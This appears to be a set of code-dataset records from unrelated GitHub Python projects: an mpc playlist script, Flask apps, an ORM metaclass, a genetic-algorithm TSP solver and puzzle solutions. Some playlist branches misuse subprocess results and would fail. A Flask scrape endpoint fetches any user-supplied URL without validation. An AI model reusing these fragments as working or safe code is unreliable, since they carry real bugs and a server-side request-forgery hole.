found = True\n if found:\n if i >= amount:\n break\n subprocess.run(['mpc', 'add', str(f.relative_to(MPD_ROOT))], check=True)\n i += 1\n elif arguments['add-random']:\n tracks = subprocess.run(['mpc', 'ls', arguments['']], stdout=subprocess.PIPE, encoding='utf-8', check=True).splitlines()\n random.shuffle(tracks)\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (1 if arguments['--number'] is None else int(arguments['--number']))\n for i, track in enumerate(tracks):\n if i >= amount:\n break\n exit_status = subprocess.run(['mpc', 'add', track]).returncode\n if exit_status != 0:\n sys.exit(exit_status)\n elif arguments['lyrics']:\n 
sys.exit(subprocess.run(['eyeD3', arguments[''] or client().playlistid()[0]['file']]).returncode) #TODO only display lyrics, not other ID3 tags\n elif arguments['pause-after-current']:\n num_tracks = int(arguments['']) if arguments[''] else 1\n c = client(idle_timeout=1)\n for i in range(num_tracks):\n song = c.currentsong()\n print('[....] {}'.format(format_song(song, arguments)), end='\\r[....]', flush=True)\n if i == num_tracks - 1:\n c.single(1)\n try:\n while True:\n progress = min(4, int(5 * float(c.status()['elapsed']) / float(song['time'])))\n print('\\r[{}{}]'.format('=' * progress, '.' * (4 - progress)), end='', flush=True)\n try:\n c.idle('player')\n except socket.timeout:\n c = client(idle_timeout=1)\n if c.currentsong().get('id') != song['id']:\n break\n except KeyboardInterrupt:\n print('\\r[ ^C ] {}'.format(format_song(song, arguments)), flush=True)\n client().single(0)\n sys.exit(1)\n print('\\r[ ok ]', flush=True)\n c.single(0)\n elif arguments['repeat-current-once']:\n current = subprocess.run(['mpc', 'current', '--format=%file%'], stdout=subprocess.PIPE, encoding='utf-8', check=True)[:-1].decode('utf-8')\n sys.exit(subprocess.run(['mpc', 'insert', current]).returncode)\n else:\n c = client()\n for song in c.playlistid():\n if int(song['pos']) > 9999:\n print('[ ** ]', 'playlist truncated')\n break\n print('[{: >4}] {}'.format(int(song['pos']), format_song(song, arguments)))\n","repo_name":"fenhl/syncbin","sub_path":"python/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"}
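The add-random branch above caps how many shuffled tracks get queued with an `amount` that may be infinite. The same pattern in isolation, with a fake track list in place of the `mpc ls` output and a plain variable in place of the docopt value:

```python
import random

tracks = ["a.flac", "b.flac", "c.flac", "d.flac"]
random.shuffle(tracks)

number = None                    # what docopt would hand over for --number
amount = 1 if number is None else (float("inf") if number == "all" else int(number))

queued = []
for i, track in enumerate(tracks):
    if i >= amount:              # float("inf") means the check never fires
        break
    queued.append(track)         # the script runs `mpc add <track>` here instead
print(queued)
```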
+{"seq_id":"7258457492","text":"from flask import Flask, request\nfrom model import db, Inventory\nfrom query_object.itemQO import ItemQO\nfrom query_object.filterQO import FilterQO\nfrom config import Config\n\napp = Flask(__name__)\nconfig = Config()\napp.config['SQLALCHEMY_DATABASE_URI'] = config.DB_PATH\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb.init_app(app)\n\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n request_data = request.get_json()\n itemQo = ItemQO(request_data.get('name', ''),\n request_data.get('category', ''),\n request_data.get('price', ''))\n return Inventory.insert(itemQo)\n\n\n@app.route('/filter', methods=['POST'])\ndef filter():\n request_data = request.get_json()\n filterQo = FilterQO(request_data.get('dt_from', ''),\n request_data.get('dt_to', ''))\n return Inventory.filter(filterQo)\n\n\n@app.route('/category', methods=['POST'])\ndef category():\n request_data = request.get_json()\n return Inventory.categorize(request_data.get('category', ''))\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n","repo_name":"kingsleylow0327/inventory_management","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"19134124233","text":"# JSON is commonly used with data APIs.\n# We can parse JSON into a Python dictionary.\n\nimport json\n\n# Sample JSON\nuserJson = '{\"firstName\": \"Louis\", \"lastName\": \"Higgins\", \"age\": 42}'\n\n# Parse to dictionary\nuser = json.loads(userJson)\n\nprint(user)\nprint(user['firstName'])\n\n# Parse dictionary to JSON\ncar = {'Make': 'Ford', 'Model': 'Mustang', 'Year': 1970}\ncarJson = json.dumps(car)\n\nprint(carJson)","repo_name":"misterjeff/Python","sub_path":"TraversyCrashCourse/pyJson.py","file_name":"pyJson.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"32935155782","text":"from collections import OrderedDict\n\nfrom .relmanager import RelManager\nfrom .fields import Field, ForeignKey, OneToOneField\nfrom .utils import tznow\nfrom . import signals\n\n# Architecture\n#\n# This is complicated enough to warrant some explanation.\n#\n# A Model class has a Meta instance.\n#\n# The Fields are instances in the Meta instance.\n#\n# For a given Model, all Field instances are shared since there is only\n# one Meta instance for that Model class. This means that a field can't know\n# it's exact Model instance, only it's parent Model class.\n\n\n# from: http://stackoverflow.com/questions/12006267/how-do-django-models-work\n# from: lib/python2.7/site-packages/django/db/models/base.py\n#\n# remember that `type` is actually a class like `str` and `int`\n# so you can inherit from it\nclass MetaModel(type):\n \"\"\"\n *do not use this class directly*\n\n *code reviews of this class are very welcome*\n\n base class for :class:`alkali.model.Model`.\n\n this complicated metaclass is required to convert a stylized class\n into a useful concrete one. it converts :class:`alkali.fields.Field`\n variables into their base types as attributes on the instantiated\n class.\n\n **Meta**: adds a ``Meta`` class if not already defined in ``Model``\n derived class\n\n **objects**: :class:`alkali.manager.Manager`\n \"\"\"\n\n # this called once per Model _definition_\n # __new__ is the method called before __init__\n # meta_class is _this_ class, aka: MetaModel\n # this makes a new MetaModel instance\n def __new__(meta_class, name, bases, attrs):\n #print \"__new__ cls:\",type(meta_class),meta_class,name\n super_new = super(MetaModel, meta_class).__new__\n\n # Also ensure initialization is only performed for subclasses of Model\n # (excluding Model class itself). 
This keeps all of Models attrs intact.\n if not any( map( lambda b: isinstance(b, MetaModel), bases ) ):\n new_class = super_new(meta_class, name, bases, attrs)\n return new_class\n\n # new_class is an instance of 'name' (aka Model) whose type is MetaModel\n # print \"new_class\", type(new_class), new_class\n # new_class \n new_class = super_new(meta_class, name, bases, {})\n new_class._add_meta( attrs )\n new_class._add_fields()\n new_class._add_manager()\n new_class._add_relmanagers()\n new_class._add_exceptions()\n\n # put the rest of the attributes (methods and properties)\n # defined in the Model derived class into the \"new\" Model\n for name, attr in attrs.items():\n setattr(new_class, name, attr)\n\n signals.model_creation.send(meta_class, model=new_class)\n\n return new_class\n\n def _add_manager( new_class ):\n from .manager import Manager\n setattr( new_class, 'objects', Manager(new_class) )\n\n def _add_relmanagers( new_class ):\n \"\"\"\n if this class has foreign keys then we need to add the\n reverse lookup into the *other* model\n \"\"\"\n for name, field in new_class.Meta.fields.items():\n if not isinstance(field, ForeignKey):\n continue\n\n # note the name=name in the lambda, this is vital to capture\n # the current value of name and not the last of the loop\n # more info: http://stackoverflow.com/questions/2295290\n rel_manager = property(\n lambda fm_instance, name=name: RelManager(fm_instance, new_class, name)\n )\n set_name = \"{}_set\".format(new_class.__name__).lower()\n setattr( field.foreign_model, set_name, rel_manager )\n\n signals.pre_delete.connect(\n new_class.objects.cb_delete_foreign,\n sender=field.foreign_model)\n\n if isinstance(field, OneToOneField):\n signals.post_save.connect(\n new_class.objects.cb_create_foreign,\n sender=field.foreign_model)\n\n def _add_exceptions( new_class ):\n from .model import ObjectDoesNotExist\n\n # dynamically create a new class types\n DoesNotExist = type('DoesNotExist', (ObjectDoesNotExist,), {} )\n EmptyPrimaryKey = type('EmptyPrimaryKey', (Exception,), {} )\n MultipleObjectsReturned = type('MultipleObjectsReturned', (Exception,), {} )\n\n setattr( new_class, 'ObjectDoesNotExist', ObjectDoesNotExist )\n setattr( new_class, 'DoesNotExist', DoesNotExist )\n setattr( new_class, 'EmptyPrimaryKey', EmptyPrimaryKey )\n setattr( new_class, 'MultipleObjectsReturned', MultipleObjectsReturned )\n\n def _add_meta( new_class, attrs ):\n\n def _get_fields( attrs ):\n return [(k, v) for k, v in attrs.items() if isinstance(v, Field)]\n\n def _get_field_order(attrs):\n \"\"\"\n returns field names in the order they were defined in the class\n \"\"\"\n fields = _get_fields(attrs)\n fields.sort(key=lambda e: e[1]._order)\n return [k for k, _ in fields]\n\n class Object():\n pass\n\n # Meta is an instance in Model class\n # all following properties on the Meta class, not instance\n meta = attrs.pop( 'Meta', Object )\n setattr( new_class, 'Meta', meta() )\n\n if not hasattr(meta, 'filename'):\n meta.filename = None\n\n if not hasattr(meta, 'storage'):\n meta.storage = None\n\n if not hasattr(meta, 'ordering'):\n meta.ordering = _get_field_order(attrs)\n\n meta.field_filter = lambda self, field_type: \\\n [n for n, f in self.fields.items() if isinstance(f, field_type)]\n\n # don't let user miss a field if they've defined Meta.ordering\n assert len(meta.ordering) == len(_get_fields(attrs)), \\\n \"missing/extra fields defined in Meta.ordering\"\n\n # put the fields into the meta class\n # meta.ordering contains field names, attrs contains 
Field types\n meta.fields = OrderedDict()\n for field in meta.ordering:\n meta.fields[field] = attrs.pop(field)\n delattr( meta.fields[field], '_order' )\n\n # make sure 'pk' isn't a field name, etc\n for d in ['pk']:\n assert d not in meta.fields\n\n # you can set a property on a class but it will only be called on an instance\n # I'd prefer this to be a read-only property but I guess that can't happen\n #\n # note: don't use a dict comprehension because interim dict will have keys\n # inserted in random order\n meta.pk_fields = OrderedDict(\n [(name, field) for name, field in meta.fields.items() if field.primary_key]\n )\n\n # monkey patch stupid fucking iterators\n meta.pk_fields._keys = meta.pk_fields.keys\n meta.pk_fields.keys = lambda: list(meta.pk_fields._keys())\n meta.pk_fields._values = meta.pk_fields.values\n meta.pk_fields.values = lambda: list(meta.pk_fields._values())\n\n meta.fields._keys = meta.fields.keys\n meta.fields.keys = lambda: list(meta.fields._keys())\n meta.fields._values = meta.fields.values\n meta.fields.values = lambda: list(meta.fields._values())\n\n if len(meta.fields):\n assert len(meta.pk_fields) > 0, \"no primary_key defined in fields\"\n\n def _add_fields( new_class ):\n \"\"\"\n put the Field reference into new_class\n \"\"\"\n meta = new_class.Meta\n\n # add properties to field\n for name, field in meta.fields.items():\n field._name = name\n fget = lambda self: getattr(self, '_name')\n setattr( field.__class__, 'name', property(fget=fget) )\n\n field._model = new_class\n fget = lambda self: getattr(self, '_model')\n setattr( field.__class__, 'model', property(fget=fget) )\n\n fget = lambda self: self.model.Meta\n setattr( field.__class__, 'meta', property(fget=fget) )\n\n # put fields in model\n for name, field in meta.fields.items():\n # make magic property model.fieldname_field that returns Field object\n fget = lambda self, name=name: self.Meta.fields[name]\n setattr( new_class, name + '__field', property(fget=fget) )\n\n # set the Field descriptor object on the model class\n # which makes it accessable on the model instance\n #\n # the field can't be a property to Meta.fields[name]\n # because then the descriptor-ness is lost and a normal\n # getattr is called on the model instance\n setattr( new_class, name, field )\n\n # creates a new instance of derived model, this is called each\n # time a Model instance is created\n def __call__(cls, *args, **kw):\n obj = cls.__new__(cls, *args)\n\n if 'pk' in kw:\n assert len(cls.Meta.pk_fields) == 1, \"can't currently set compound primary key via kwargs\"\n\n field_name = cls.Meta.pk_fields.keys()[0]\n assert field_name not in kw, \"can't pass in 'pk' and actual pk field name\"\n\n value = kw.pop('pk')\n kw[field_name] = value\n\n # put field values (int,str,etc) into model instance\n for name, field in cls.Meta.fields.items():\n if getattr(field, 'auto_now', False):\n value = kw.pop(name, tznow().isoformat())\n elif getattr(field, 'auto_now_add', False):\n value = kw.pop(name, tznow().isoformat())\n else:\n # THINK: this somewhat duplicates Field.__set__ code\n value = kw.pop(name, field.default_value)\n\n value = field.cast(value)\n\n # store the actual value in the model's __dict__, used by Field.__get__\n obj.__dict__[name] = value\n\n obj._dirty = False\n obj.__init__(*args, **kw)\n\n return 
obj\n","repo_name":"kneufeld/alkali","sub_path":"alkali/metamodel.py","file_name":"metamodel.py","file_ext":"py","file_size_in_byte":10018,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"39"}
+{"seq_id":"11723131283","text":"def generator(input_ids,attention_mask,send_s_po,start_tokens,end_tokens,c_relation,batch_size):\n i=0\n while 1:\n input_ids_b = input_ids[i*batch_size:(i+1)*batch_size]\n attention_mask_b = attention_mask[i*batch_size:(i+1)*batch_size]\n send_s_po_b = send_s_po[i*batch_size:(i+1)*batch_size]\n start_tokens_b = start_tokens[i*batch_size:(i+1)*batch_size]\n end_tokens_b = end_tokens[i*batch_size:(i+1)*batch_size]\n c_relation_b = c_relation[i*batch_size:(i+1)*batch_size]\n # 最重要的就是这个yield,它代表返回,返回以后循环还是会继续,然后再返回。就比如有一个机器一直在作累加运算,但是会把每次累加中间结果告诉你一样,直到把所有数加完\n yield({'input_1': input_ids_b, 'input_2': attention_mask_b,'input_3':send_s_po_b}, \n {'s_start': start_tokens_b,'s_end':end_tokens_b,'relation':c_relation_b})\n i = (i+1)%(len(input_ids)//batch_size)\n \nmodel.fit_generator(generator(input_ids,attention_mask,send_s_po,start_tokens,end_tokens,c_relation,batch_size),epochs=eopch,steps_per_epoch=steps_per_epoch,verbose=1,\n callbacks=[Metrics(model_2,model_3,id2p,va_text_list,va_spo_list,va_input_ids,va_attention_mask,tokenizer)])\n","repo_name":"zhengyanzhao1997/NLP-model","sub_path":"model/Trick/fit_generator.py","file_name":"fit_generator.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"39"}
+{"seq_id":"31692147134","text":"import time\nimport numpy as np\nfrom tqdm import trange\nimport matplotlib.pyplot as plt\n\n\n\ndef PMX(ind1, ind2, separator_no=2):\n new_ind1, new_ind2 = ind1.copy(), ind2.copy()\n idxs = sorted(np.random.choice(len(ind1), separator_no, replace=False))\n \n group = np.random.choice(separator_no-1)\n start, end = idxs[group], idxs[group+1]\n \n tmp = ind1[start:end].copy()\n ind1[start:end] = ind2[start:end]\n ind2[start:end] = tmp\n \n for i in range(len(ind1)):\n if start <= i < end:\n continue\n \n while ind1[i] in ind1[start:end]:\n # get elem from the other ind\n idx_of_elem = np.nonzero(ind1[start:end] == ind1[i])[0][0]\n ind1[i] = ind2[start+idx_of_elem]\n \n while ind2[i] in ind2[start:end]:\n # get elem from the other ind\n idx_of_elem = np.nonzero(ind2[start:end] == ind2[i])[0][0]\n ind2[i] = ind1[start+idx_of_elem]\n\n return ind1, ind2\n\ndef tsp_objective_function(p, dist):\n s = 0.0\n for i in range(len(p)):\n s += dist[p[i-1], p[i]]\n return s\n\ndef reverse_sequence_mutation(p, *args):\n a = np.random.choice(len(p), 2, False)\n i, j = a.min(), a.max()\n q = p.copy()\n q[i:j+1] = q[i:j+1][::-1]\n return q\n\ndef default_generate_population_function(chromosome_length, population_size):\n current_population = np.array([np.random.permutation(chromosome_length).astype(np.int64) \n for _ in range(population_size)])\n return current_population\n\n\nclass SGA:\n \n def __init__(self, population_size, chromosome_length, distance_matrix, crossover_func=PMX, objective_func=tsp_objective_function, mutation_func=reverse_sequence_mutation, generate_population_func=default_generate_population_function, replace_method='mu+lambda', number_of_offspring=None, crossover_probability = 0.95, mutation_probability = 0.25, number_of_iterations = 250, no_groups=2):\n \n self.population_size = population_size\n self.chromosome_length = chromosome_length\n \n self.crossover_func = crossover_func\n self.objective_func = objective_func\n self.mutation_func = mutation_func\n self.generate_population_func = generate_population_func\n self.distance_matrix = distance_matrix\n \n if number_of_offspring is None:\n number_of_offspring = population_size\n self.number_of_offspring = number_of_offspring\n self.crossover_probability = crossover_probability\n self.mutation_probability = mutation_probability\n self.number_of_iterations = number_of_iterations\n assert replace_method in ['mu+lambda', 'lambda'], 'wrong replace_method: [\"mu+lambda\", \"lambda\"]'\n self.replace_method = replace_method\n self.no_groups = no_groups\n \n \n def run(self, verbose=False, with_tqdm=False):\n time0 = time.time()\n self.mean_costs = np.zeros(self.number_of_iterations)\n self.min_costs = np.zeros(self.number_of_iterations)\n self.max_costs = np.zeros(self.number_of_iterations)\n\n self.best_objective_value = np.Inf\n self.best_chromosome = np.zeros((1, self.chromosome_length))\n\n current_population = self._generate_random_population()\n objective_values = np.array(list(map(lambda ind: self.objective_func(ind, self.distance_matrix), current_population)))\n \n if with_tqdm:\n range_ = trange(self.number_of_iterations, position=0, leave=True)\n else:\n range_ = range(self.number_of_iterations)\n \n for t in range_:\n parent_indices = self._select_parent_indices(objective_values)\n\n children_population = self._generate_children_population(current_population, parent_indices)\n\n self._mutate_children_population(children_population)\n\n children_objective_values = 
self._eval_children(children_population)\n \n current_population, objective_values = self._replace_population(current_population, objective_values, children_population, children_objective_values)\n\n # recording some statistics\n if objective_values[0] < self.best_objective_value: # minimisation: the original comparison was reversed and never fired, because best starts at np.Inf\n self.best_objective_value = objective_values[0]\n self.best_chromosome = current_population[0, :]\n \n self.mean_costs[t] = objective_values.mean()\n self.min_costs[t] = objective_values.min()\n self.max_costs[t] = objective_values.max()\n \n if verbose:\n print('%3d %14.8f %12.8f %12.8f %12.8f %12.8f' % (t, time.time() - time0, objective_values.min(), objective_values.mean(), objective_values.max(), objective_values.std()))\n \n \n def plot_costs(self, title=''):\n plt.title(title)\n plt.plot(self.max_costs, label='max')\n plt.plot(self.min_costs, label='min')\n plt.plot(self.mean_costs, label='mean')\n plt.show()\n \n \n def _generate_random_population(self):\n return self.generate_population_func(self.chromosome_length, self.population_size)\n \n \n def _generate_children_population(self, current_population, parent_indices):\n children_population = np.zeros((self.number_of_offspring, self.chromosome_length), dtype=np.int64)\n \n for i in range(self.number_of_offspring//2):\n if np.random.random() < self.crossover_probability:\n children_population[2*i, :], children_population[2*i+1, :] = self.crossover_func(current_population[parent_indices[2*i], :].copy(), current_population[parent_indices[2*i+1], :].copy(), self.no_groups)\n else:\n children_population[2*i, :], children_population[2*i+1, :] = current_population[parent_indices[2*i], :].copy(), current_population[parent_indices[2*i+1]].copy()\n\n if np.mod(self.number_of_offspring, 2) == 1:\n children_population[-1, :] = current_population[parent_indices[-1], :]\n \n return children_population\n \n \n def _select_parent_indices(self, objective_values):\n fitness_values = objective_values.max() - objective_values\n \n if fitness_values.sum() > 0:\n fitness_values = fitness_values / fitness_values.sum()\n else:\n fitness_values = np.ones(self.population_size) / self.population_size\n parent_indices = np.random.choice(self.population_size, self.number_of_offspring, \n True, fitness_values).astype(np.int64)\n return parent_indices\n \n \n def _mutate_children_population(self, children_population):\n for i in range(self.number_of_offspring):\n if np.random.random() < self.mutation_probability:\n children_population[i, :] = self.mutation_func(children_population[i, :], self.no_groups)\n \n \n def _eval_children(self, children_population):\n children_objective_values = np.zeros(self.number_of_offspring)\n for i in range(self.number_of_offspring):\n children_objective_values[i] = self.objective_func(children_population[i, :], self.distance_matrix)\n return children_objective_values\n \n \n def _replace_population(self, current_population, objective_values, children_population, children_objective_values):\n if self.replace_method == 'mu+lambda':\n objective_values = np.hstack([objective_values, children_objective_values])\n current_population = np.vstack([current_population, children_population])\n\n idxs = np.argsort(objective_values)\n current_population = current_population[idxs[:self.population_size], :]\n objective_values = objective_values[idxs[:self.population_size]]\n elif self.replace_method == 'lambda':\n current_population = children_population\n objective_values = children_objective_values\n \n return current_population, 
objective_values","repo_name":"jgrodzicki/UWR-II","sub_path":"Algorytmy Ewolucyjne/Assignment 2/SGA.py","file_name":"SGA.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"5267155337","text":"import time\nimport tkinter\nimport tkinter.messagebox\n\ndef download():\n # 模拟下载任务需要花费10秒钟时间\n time.sleep(10)\n tkinter.messagebox.showinfo('提示', '下载完成!')\n\n# 显示信息\ndef show_about():\n tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)')\n\ndef main():\n # 建议一个页面\n top = tkinter.Tk()\n # 标题\n top.title('单线程')\n # 窗口大小\n top.geometry('200x150')\n top.wm_attributes('-topmost', True)\n\n # 面板\n panel = tkinter.Frame(top)\n # 下载 按钮\n button1 = tkinter.Button(panel, text='下载', command=download)\n button1.pack(side='left')\n # 关于 按钮\n button2 = tkinter.Button(panel, text='关于', command=show_about)\n button2.pack(side='right')\n panel.pack(side='bottom')\n\n tkinter.mainloop()\n\nif __name__ == '__main__':\n main()","repo_name":"PorterZhang2021/Python-StudyNotes","sub_path":"1.Python-100-Days-StudyNotes/基础篇/代码/Day13/code_8.py","file_name":"code_8.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28025526495","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport requests\nfrom bs4 import BeautifulSoup\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/scrape', methods=['GET', 'POST'])\ndef scrape():\n if request.method == 'POST':\n url = request.form.get('url_to_scrape', 'http://localhost/my_git/python/app_1/test.html') # Use POST field if available\n else:\n url = 'http://localhost/my_git/python/app_1/test.html' # Default URL to scrape\n\n headers = {'User-Agent': 'Mozilla/5.0'}\n r = requests.get(url, headers=headers)\n \n if r.status_code == 200:\n soup = BeautifulSoup(r.content, 'html.parser')\n items = []\n\n for a_tag in soup.find_all('a', class_='something'):\n items.append(a_tag.text)\n\n return jsonify({'items': items})\n else:\n return jsonify({'error': 'Failed to retrieve data', 'status_code': r.status_code})\n\n@app.route('/another', methods=['GET'])\ndef another_route():\n page = request.args.get('page', 0, type=int)\n name = request.args.get('name', \"\", type=str)\n print(f\"Page variable is: {page}\")\n return jsonify({\"message\": \"Hello from another route!\", \"page\" : page, \"name\" : name})\n\n@app.route('/test', methods=['POST'])\ndef test_route():\n name = request.form.get('name', 'Anonymous') # Default to \"Anonymous\" if \"name\" is not provided\n return jsonify({\"message\": f\"Hello, {name}!\"})\n\nif __name__ == '__main__':\n app.run(port=5000)\n","repo_name":"xrvel/python","sub_path":"app_1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"71759144435","text":"# 给定 m x n 矩阵 matrix 。\n#\n# 你可以从中选出任意数量的列并翻转其上的 每个 单元格。(即翻转后,单元格的值从 0 变成 1,或者从 1 变为 0 。)\n#\n# 返回 经过一些翻转后,行与行之间所有值都相等的最大行数 。\n#\n#\n#\n# 示例 1:\n#\n# 输入:matrix = [[0,1],[1,1]]\n# 输出:1\n# 解释:不进行翻转,有 1 行所有值都相等。\n# 示例 2:\n#\n# 输入:matrix = [[0,1],[1,0]]\n# 输出:2\n# 解释:翻转第一列的值之后,这两行都由相等的值组成。\n# 示例 3:\n#\n# 输入:matrix = [[0,0,0],[0,0,1],[1,1,0]]\n# 输出:2\n# 解释:翻转前两列的值之后,后两行由相等的值组成。\n#\n#\n# 提示:\n#\n# m == matrix.length\n# n == matrix[i].length\n# 1 <= m, n <= 300\n# matrix[i][j] == 0 或 1\nfrom collections import Counter\nfrom typing import List\n\n\nclass Solution:\n def maxEqualRowsAfterFlips1(self, matrix: List[List[int]]) -> int:\n r, c = len(matrix), len(matrix[0])\n n_group = 1\n group = [range(r)]\n def divide(l, j): # l 是一个分组的所有下标列表,第 j 列与第 0 列 对应行进行异或运算,按结果进行分组\n a, b = [], []\n for i in l:\n if matrix[i][0] ^ matrix[i][j]:\n a.append(i)\n else:\n b.append(i)\n if len(a) > len(b):\n return a, b\n return b, a\n for i in range(1, c):\n for k, g in enumerate(group):\n if len(g) == 0: continue\n a, b = divide(g, i)\n if len(b) == 0: continue\n group[k] = a\n group.append(b)\n return max(len(g) for g in group)\n\n def maxEqualRowsAfterFlips(self, matrix: List[List[int]]) -> int:\n # 更简洁的方法\n r, c = len(matrix), len(matrix[0])\n nums = [0] * r\n for i in range(r):\n reverse = True if matrix[i][0] == 1 else False\n for j in range(c):\n if reverse:\n matrix[i][j] ^= 1\n nums[i] = (nums[i] << 1) + matrix[i][j]\n c = Counter(nums)\n return max(c.values())\n\n","repo_name":"wangsun39/leetcode","sub_path":"all-code/1000-1100/1072maxEqualRowsAfterFlips.py","file_name":"1072maxEqualRowsAfterFlips.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"17694288372","text":"class SumNums():\n def __init__(self,nums,target):\n self.nums=nums\n self.target=target\n numbers=[]\n index=[]\n for i in self.nums:\n numbers.append(i)\n numbers.sort()\n numbers.reverse()\n for i in numbers:\n if self.target-i>=0:\n for j in self.nums:\n if i==j:\n index.append(self.nums.index(j))\n self.target-=i\n index.sort()\n for i in index:\n print('index-',i)\nprint(SumNums([2,4,3,1],7))","repo_name":"knnaliev95/InterviewPreparation","sub_path":"sumnums.py","file_name":"sumnums.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"40803889921","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\n# 빨간 구슬을 구멍을통해 빼냄\n# 보드에 구멍이 하나 있따\n# 게임이 실패하는 경우 -1 을 출력한다\n# 1. 파란 구슬이 구멍에 들어가면 x 2. 동시에 빠져도 실패 3.더이상 구슬이 움직이지 x\n# 중력\n\nn, m = map(int, input().split())\narr = list(list(input()) for _ in range(n))\n\n################### DAY 9, 백준 코드랑 비교\nrx = ry = bx = by = gx = gy = 0\nfor i in range(n):\n for j in range(m):\n # 빨간 공\n if arr[i][j] == 'R':\n rx, ry = i, j\n arr[i][j] = '.'\n # 파란 공\n elif arr[i][j] == 'B':\n bx, by = i, j\n arr[i][j] = '.'\n elif arr[i][j] == 'O':\n gx, gy = i, j\n# print(gx, gy)\ndef inbox(x, y):\n if 0 <= x < n and 0 <= y < m and arr[x][y] != '#':\n return True\n else:\n return False\n\ndef gravity(x, y, dx, dy):\n\n while True:\n # 벽을 만나서 멈추면\n if not inbox(x, y):\n x -= dx\n y -= dy\n return x, y\n if x == gx and y == gy:\n return x, y\n x += dx\n y += dy\n\n\ndef bfs(ri, rj, bi, bj):\n visited = {(i, j, ii, jj): 0 for i in range(n) for j in range(m) for ii in range(n) for jj in range(m)}\n visited[(ri, rj, bi, bj)] = 1\n q = [(0, ri, rj, bi, bj)]\n while q:\n d, rx, ry, bx, by = q.pop(0)\n # if d > 10: return -1\n # print(d, rx, ry, bx, by)\n for dx, dy in (0, 1), (1, 0), (0, -1), (-1, 0):\n red = gravity(rx, ry, dx, dy)\n blue = gravity(bx, by, dx, dy)\n nrx, nry = red[0], red[1]\n nbx, nby = blue[0], blue[1]\n # 두 개다 빠진 경우\n if arr[nrx][nry] == 'O' and arr[nbx][nby] == 'O':\n continue\n # 두 개 좌표가 같을 경우\n # 더 가까이 있던 공을 위치로\n if red == blue:\n reddis = abs(rx-nrx) + abs(ry-nry)\n bluedis = abs(bx-nbx) + abs(by-nby)\n if reddis > bluedis:\n nrx -= dx\n nry -= dy\n else:\n nbx -= dx\n nby -= dy\n\n # 파란공만 빠진 경우\n if arr[nrx][nry] != 'O' and arr[nbx][nby] == 'O':\n continue\n # 빨간공이 빠졌을 경우\n if arr[nrx][nry] == 'O' and arr[nbx][nby] != 'O':\n return d+1\n if rx == nrx and ry == nry and bx == nbx and by == nby:continue\n if visited[(nrx, nry, nbx, nby)]: continue\n visited[(nrx, nry, nbx, nby)] = 1\n q.append((d+1, nrx, nry, nbx, nby))\n return -1\n\n\nprint(bfs(rx, ry, bx, by))\n# 뭐부터 검사해야하는지 순서가 무척 중요했다\n# 아... visited 체크를 안했다..바보다 바보 ..","repo_name":"sigk218/algorithm_100","sub_path":"2019-2020.08/93_baekjoon_구슬탈출.py","file_name":"93_baekjoon_구슬탈출.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"11235727402","text":"# pylint: disable=C0114, C0115, E5142\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# Base class for all feed activities\nclass Activity(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n last_modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = [\"-last_modified\"]\n","repo_name":"ChicoState/readerhub","sub_path":"app1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"32422382603","text":"import re\n# Написать регулярное выражение, определяющее является ли данная строка \n#строкой \"abcdefghijklmnopqrstuv18340\" или нет.\ndef stringing(a):\n if not a :\n return False\n str='abcdefghijklmnopqrstuv18340'\n result = re.findall(a, str) \n if result==str.split():\n return True\n else:\n return False\n ","repo_name":"inessa111/Program-engineering-","sub_path":"Labs/LR1/module/lr1_2.py","file_name":"lr1_2.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"15550178052","text":"def solve(n, k):\n cnt = 0\n for d in range(1, n + 1):\n if n % d == 0:\n cnt += 1\n if cnt == k:\n return d\n return 0\n\nN, K = map(int, input().split())\nprint(solve(N, K))","repo_name":"joonion/computational-thinking-for-coding","sub_path":"Chap.04.Sorting&Searching/2501.약수구하기/solve.1.py","file_name":"solve.1.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
